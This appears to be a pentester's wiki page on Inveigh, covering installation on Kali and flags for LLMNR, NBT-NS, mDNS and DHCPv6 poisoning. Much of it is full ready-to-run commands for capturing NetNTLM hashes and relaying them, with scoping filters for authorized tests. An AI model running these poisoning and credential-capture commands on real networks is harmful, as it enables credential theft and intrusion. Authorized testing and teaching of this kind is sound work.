Inveigh

My preferred tool for coercion and relay attacks is Inveigh. Inveigh is similar to MITM6 and Responder but has more customization. Also, since it’s Dotnet is can be run in both windows and Linux fairly easily.

Installation (Kali Linux)

mkdir -p $PROJECT_DIR/tools;cd $PROJECT_DIR/tools
git clone https://github.com/Kevin-Robertson/Inveigh
cd Inveigh

# Install DotNet8
wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
rm packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install -y dotnet-sdk-8.0

# Compile Inveigh
dotnet publish -r linux-x64 -f net8.0 -p:AssemblyName=inveigh
cd ./Inveigh/bin/Release/net8.0/linux-x64/
echo "export PATH=$PATH:$(pwd)" >> ~/.zshrc
export PATH=$PATH:$(pwd)
cd ../../../../../

The Dotnet version of Inveigh seems to be updated about once a year. If the above stops works, replace all mentions of Dotnet 8 with Dotnet 9 and see if that works.

Custom Flags and Variables

Inveigh has A LOT of flags, below are some of the more useful ones along with examples on how to use them. The inveigh flags generally work on toggling things on and off with flags like -SMB Y to turn on the SMB server and -SMB N to turn it off.

Help

Inveigh’s help is slightly different since the project was originally built for just windows before it was ported over to Dotnet. You can use the help to figure out the default flags.

inveigh -?

Note that for some reason, you must use the EXACT command above to get help. If there is anything else it will not work. Ex: inveigh -SMB Y -? will not work since there is a flag in-between inveigh and -?

Responder Replacement

The LLMNR, NBTS, and MDNS toggle on and off the poisoners for those services. Turning all of these on will do what Responder.py does.

LLMNR Poisoner: On=-LLMNR Y / Off=-LLMNR N
NBT-NS Poisoner: On=-NBNS Y / Off=-NBNS N
mDNS Poisoner: On=-MDNS Y / Off=-MDNS N

MITM6 Replacement

The DHCPv6 flag and ICMPv6 flag controls turning on / off DHCPv6 attacks. Turing them on will make inveigh do MITM6 like attacks.

DHCPv6 Poisoner: On=-DHCPv6 Y / Off=-DHCPv6 N
Send IPv6 Router Advertisements: On=-ICMPv6 Y / Off=-ICMPv6 N

Controlling Logging and Output

There is a lot of customization in how much it output, but in my experience it’s always best to have it log to a file and run the Console output at level 1.

Save logs in File (tee): On=-FileOutput Y -LogOutput Y / Off=-FileOutput N -LogOutput N
Set Console Output level: -Console <1-5> (-Console 1 is recommended)

Malicious Services

Just like Responder and MITM6, inveigh has a few malicious services like SMB, HTTP, LDAP, DNS, Proxy, and WPDA servers. Note that this does not have any many services as Responder since inveigh just has the six services.

Malicious SMB Service: On=-SMB Y / Off=-SMB N
Malicious HTTP Service: On=-HTTP Y / Off=-HTTP N
Malicious LDAP Service: On=-LDAP Y / Off=-LDAP N
Malicious DNS Service: On=-DNS Y / Off=-DNS N
Malicious WPAD Service: On=-WPAD Y / Off=-WPAD N
Malicious Proxy Service (I’m not sure what this is…): On=-Proxy Y / Off=-Proxy N

Limit Attack

The HUGE advantage of Inveigh over Responder and MITM6 is it’s ability to limit the attack. Both Responder and MITM6 can do some degree of filtering, but it’s much less flexible than Inveigh. There are two main cases where this is helpful to me.

When the whole local network is not in scope (i.e. The client cherry picked IPs). In these cases, I limit the ReplyToIPs (For Local Network Poisoing) or the ReplyToMACs (For IPv6 attacks) the active hosts list.
When poison-able requests are infrequent and I need to leave the poisoner running overnight. In these cases I limit the attack to a certain time period or tell it to stop after it has captured a hash.

Also, I will always set a ReplyToDomains filter for the DNS poisoner since we are going for creds and not trying to block the end users from reaching Bing… although that would be a kind thing to do.

Limit DNS Poisoning to Domain(s): Single=-ReplyToDomains example.com / Multi=-ReplyToDomains example.com,sub.example.com
Limit attack to IP(s): Single=-ReplyToIPs 10.0.0.2 / Multi=-ReplyToIPs 10.0.0.2,10.0.0.3
Limit attack to Mac(s): Single=-ReplyToMACs ff:ff:ff:ff:ff:ff / Multi=-ReplyToMACs ff:ff:ff:ff:ff:ff,aa:aa:aa:aa:aa:aa

Input Files as Mac/IP Filters

There is no native support for input files for lists of IPs or Macs to filter. Therefore, I came up with the below to help this process. Note that the input file MUST be a list of IPs only, NO CIDRs OR RANGES.

Define file path variable (Prompt)

read-setvar INVEIGH_TARGETS 'Target active IPs (NO CIDRs) list file path: '

Limited to in-scope IPs (Flag only): Only use for local network poisoning (LLMNR, NBT-NS, mDNS)

-ReplyToIPs $(tr '\n' ',' < $INVEIGH_TARGETS | sed 's/.$//')

Limit to in-scope MACs (Flag only): Only needed for IPv6 DHCP attacks

-ReplyToMACs $(for IP in $(cat $INVEIGH_TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Auto Shutdown

You can configure inveigh to automatically shutdown when certain criteria are hit like a time limit or a certain number of capture hashes.

Limit Runtime (In Minutes): -RunTime <MM> (Ex: -RunTime 15 to run attack for 15 minutes
Limit Hash Capture: -RunCount <#> (Ex: -RunCount 1 to run until 1 NetNTLM hash is captured)

Example Inveigh Commands

Below is my suggestion on full Inveigh commands to use during a pentest. Make sure to set the Domain name and targets file path before running any of the below.

Define variable (Prompt)

read-setvar ADDOMAIN 'Domain of Active Directory account: '
read-setvar INVEIGH_TARGETS 'Target active IPs (NO CIDRs) list file path: '

Note that I use sudo env "PATH=$PATH" inveigh to run inveigh as root while passing in the local user path where inveigh is installed.

Passive-ish Attack

Fully Passive Listener

inveigh -Inspect Y -DHCPv6 Y -MDNS Y -NBNS Y -HTTPS Y -FileOutput Y -LogOutput Y-FileOutput Y -LogOutput Y

Only capture hashes

inveigh -LLMNR N -NBNS N -MDNS N -ICMPV6 N -DNS N

IPv6 Attack

Capture Hashes (Start SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS N -LLMNR N -MDNS N -SMB Y -DHCPV6 Y -HTTP Y -ICMPv6 N -Console 1 -DNS Y -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToMACs $(for IP in $(cat $INVEIGH_TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Flip the -ICMPv6 N to -ICMPv6 Y if you want to send out IPv6 router advertisements

Relay (No SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS N -LLMNR N -MDNS N -SMB Y -DHCPV6 Y -HTTP Y -ICMPv6 N -Console 1 -DNS Y -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToMACs $(for IP in $(cat $INVEIGH_TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Local Network Poisoning

Capture Hashes (Start SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB Y -DHCPV6 N -HTTP Y -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $INVEIGH_TARGETS | sed 's/.$//')

Relay (No SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB N -DHCPV6 N -HTTP N -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $INVEIGH_TARGETS | sed 's/.$//')

All-in-one (IPv6 & LNP Attack)

Capture Hashes (Start SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB Y -DHCPV6 Y -HTTP Y -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $INVEIGH_TARGETS | sed 's/.$//') -ReplyToMACs $(for IP in $(cat $INVEIGH_TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Relay (No SMB/HTTP servers)

sudo env "PATH=$PATH" inveigh -NBNS Y -LLMNR Y -MDNS Y -SMB N -DHCPV6 Y -HTTP N -ICMPv6 N -Console 1 -DNS Y -IgnoreQueries ISATAP,isatap -ReplyToDomains $ADDOMAIN -FileOutput Y -LogOutput Y -ReplyToIPs $(tr '\n' ',' < $INVEIGH_TARGETS | sed 's/.$//') -ReplyToMACs $(for IP in $(cat $INVEIGH_TARGETS); do arp $IP | grep -Ev 'HWaddress| -- no entry|(incomplete)' | awk -F' ' '{print $3}'; done | tr '\n' ',' | sed 's/.$//')

Flip the -ICMPv6 N to -ICMPv6 Y if you want to send out IPv6 router advertisements

PreviousTunneling Windows VM to Target Environment (WireGuard)NextRPC Coercion

Last updated 2 months ago

hashtagInstallation (Kali Linux)

hashtagCustom Flags and Variables

hashtagHelp

hashtagResponder Replacement

hashtagMITM6 Replacement

hashtagControlling Logging and Output

hashtagMalicious Services

hashtagLimit Attack

hashtagExample Inveigh Commands

hashtagPassive-ish Attack

hashtagIPv6 Attack

hashtagLocal Network Poisoning

hashtagAll-in-one (IPv6 & LNP Attack)

Installation (Kali Linux)

Custom Flags and Variables

Help

Responder Replacement

MITM6 Replacement

Controlling Logging and Output

Malicious Services

Limit Attack

Example Inveigh Commands

Passive-ish Attack

IPv6 Attack

Local Network Poisoning

All-in-one (IPv6 & LNP Attack)